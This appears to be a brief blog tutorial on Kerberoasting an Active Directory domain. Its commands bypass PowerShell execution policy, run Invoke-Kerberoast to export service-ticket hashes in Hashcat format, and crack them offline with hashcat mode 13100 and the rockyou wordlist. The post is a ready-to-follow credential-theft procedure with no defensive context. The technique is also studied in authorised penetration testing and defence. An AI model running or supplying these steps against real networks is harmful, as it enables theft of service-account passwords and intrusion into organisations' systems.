How to Kerberoast
Prerequisites
Make sure you’re on a domain joined computer, or are running PowerShell in the context of a domain user.
Download the required script from Github here, or a local copy can be found here.
PowerShell
Enable script execution:
1
powershell –ExecutionPolicy Bypass
Import & Run
Import the Kerberoast module:
1
Import-Module .\Invoke-Kerberoast.ps1
Run Invoke-Kerberoast:
1
Invoke-Kerberoast -OutputFormat Hashcat | Export-Csv -Path kerb.csv
Crack Tokens
From the output CSV file, copy the tickets from the Hash
column.
Paste these tickets into a text file tickets.txt
.
You can use the following command in PowerShell to attempt to crack the tickets with Hashcat:
1
.\hashcat64.exe -m 13100 -a 0 .\tickets.txt .\rockyou.txt
This post is licensed under CC BY 4.0 by the author.